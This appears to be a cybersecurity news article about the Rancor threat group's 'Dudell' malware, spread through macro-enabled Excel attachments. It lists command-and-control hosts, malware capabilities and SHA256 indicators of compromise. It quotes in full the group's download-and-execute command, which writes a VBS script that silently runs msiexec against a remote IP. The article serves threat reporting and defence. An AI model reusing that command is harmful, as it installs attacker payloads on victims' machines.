Thursday, May 1, 2025
HomeMalwareUnknown Hacking Group Launching Custom Malware "Dudell" via Weaponized Microsoft Excel Documents

Unknown Hacking Group Launching Custom Malware “Dudell” via Weaponized Microsoft Excel Documents

Published on

SIEM as a Service

Follow Us on Google News

Researchers discovered a new wave of custom malware campaign named as “Dudell” from previous unknown cyberespionage group dubbed Rancor.

Rancor Threat group active since 2017, and they continuously targeting the government organization until January 2019, in this current campaign, researchers discovered an undocumented custom malware.

Additionally, the group using another malware family called “Derusbi” to load a secondary payload once it infiltrates a target, and malware will be installed in the victim’s machine by conducting 2 rounds of attack.

- Advertisement - Google News

Researchers observed that, the attacker sent via 149.28.156[.]61 to deliver either Derusbi or KHRat samples with either  cswksfwq.kfesv[.]xyz or connect.bafunpda[.]xyz as C2.

Rancor has a record of conducting targeted attacks in Southeast Asia throughout 2017 and 2018.

DUDELL Malware Infection Process

DUDELL malware initially observed form weaponized Microsoft excel document via malspam email attachment.

Once the victims open the attachment, a malicious Macro will be triggered and runs on the victim’s machine when clicks “Enable Content”.

During this process, the macro locates and executes the following data located under the Company field in the document’s properties. 

cmd /c set /p=Set v=CreateObject(^”Wscript.Shell^”):v.Run ^”msiexec /q /i http://199.247.6[.]253/ud^”,false,0 <nul > C:\Windows\System32\spool\drivers\color\tmp.vbs

We could see the C2 server IP in this data and the script downloads the second stage of the payload via Microsoft tool msiexec .

Researchers from Palo Alto networks Said, “we discovered a similar VBS script used by the Rancor actors that might give us some clues on what the contents of tmp.vbs would resemble. File office.vbs”

Another export function called DllInstall observed in this campaign which is responsible for the core behavior of the malware.

Once its executed, hidden window created by the malware filters attempt to evade sandbox analysis the malware sends victim information such as: hostname, IP address, Language Pack along with other operating system information.

Malware also has the following capabilities:

  • Terminate a specific process
  • Enumerate processes
  • Upload file
  • Download file
  • Delete file
  • List folder contents
  • Enumerate storage volumes
  • Execute a command
  • Reverse shell
  • Take a screenshot

Researchers observed a VB script named Chrome.vbs that associated with the Rancor group, and the VBScript is obfuscated and contains packed data that is used to infect a target with multiple chained persistent artifacts.

Custom Malware

Indicators of Compromise

SHA256:

0EB1D6541688B5C87F620E76219EC5DB8A6F05732E028A9EC36195D7B4F5E707
AAEBF987B8D80D71313C3C0F2C16D60874FFECBDDA3BB6B44D6CBA6D38031609
0D61D9BAAB9927BB484F3E60384FDB6A3709CA74BC6175AB16B220A68F2B349E
DB982B256843D8B6429AF24F766636BB0BF781B471922902D8DCF08D0C58511E
CC081FFEA6F4769733AF9D0BAE0308CA0AE63667FA225E7965DF0884E96E2D2A
BC1C3E754BE9F2175B718ABA62174A550CDC3D98AB9C36671A58073140381659
83d1d181a6d583bca2f03c3c4e517757a766da5f4c1299fbbe514b3e2abd9e0d

Also Read:

Microsoft Warns about the new Campaign that Delivers FlawedAmmyy RAT via Weaponized MS Excel Documents

TA505 APT Hackers Launching ServHelper Backdoor Malware via Weaponized Excel Documents

New CHAINSHOT Malware Attack Carried Adobe Flash 0-day Exploit with Weaponized Microsoft Excel Documents

Balaji
Balaji
BALAJI is an Ex-Security Researcher (Threat Research Labs) at Comodo Cybersecurity. Editor-in-Chief & Co-Founder - Cyber Security News & GBHackers On Security.

Latest articles

Apache ActiveMQ Vulnerability Lets Remote Hackers Execute Arbitrary Code

A high vulnerability in Apache ActiveMQ’s .NET Message Service (NMS) library has been uncovered,...

Commvault Confirms Zero-Day Attack Breached Its Azure Cloud Environment

Commvault, a global leader in data protection and information management, has confirmed that a...

FBI Uncovers 42,000 Phishing Domains Tied to LabHost PhaaS Operation

The Federal Bureau of Investigation (FBI) has revealed the existence of 42,000 phishing domains...

Tor Browser 14.5.1 Released with Enhanced Security and New Features

The Tor Project has announced the official release of Tor Browser 14.5.1, introducing a...

Resilience at Scale

Why Application Security is Non-Negotiable

The resilience of your digital infrastructure directly impacts your ability to scale. And yet, application security remains a critical weak link for most organizations.

Application Security is no longer just a defensive play—it’s the cornerstone of cyber resilience and sustainable growth. In this webinar, Karthik Krishnamoorthy (CTO of Indusface) and Phani Deepak Akella (VP of Marketing – Indusface), will share how AI-powered application security can help organizations build resilience by

Discussion points


Protecting at internet scale using AI and behavioral-based DDoS & bot mitigation.
Autonomously discovering external assets and remediating vulnerabilities within 72 hours, enabling secure, confident scaling.
Ensuring 100% application availability through platforms architected for failure resilience.
Eliminating silos with real-time correlation between attack surface and active threats for rapid, accurate mitigation

More like this

New WordPress Malware Disguised as Anti-Malware Plugin Takes Full Control of Websites

The Wordfence Threat Intelligence team has identified a new strain of WordPress malware that...

Konni APT Deploys Multi-Stage Malware in Targeted Organizational Attacks

A sophisticated multi-stage malware campaign, potentially orchestrated by the North Korean Konni Advanced Persistent...

Outlaw Cybergang Launches Global Attacks on Linux Environments with New Malware

The Outlaw cybergang, also known as “Dota,” has intensified its global assault on Linux...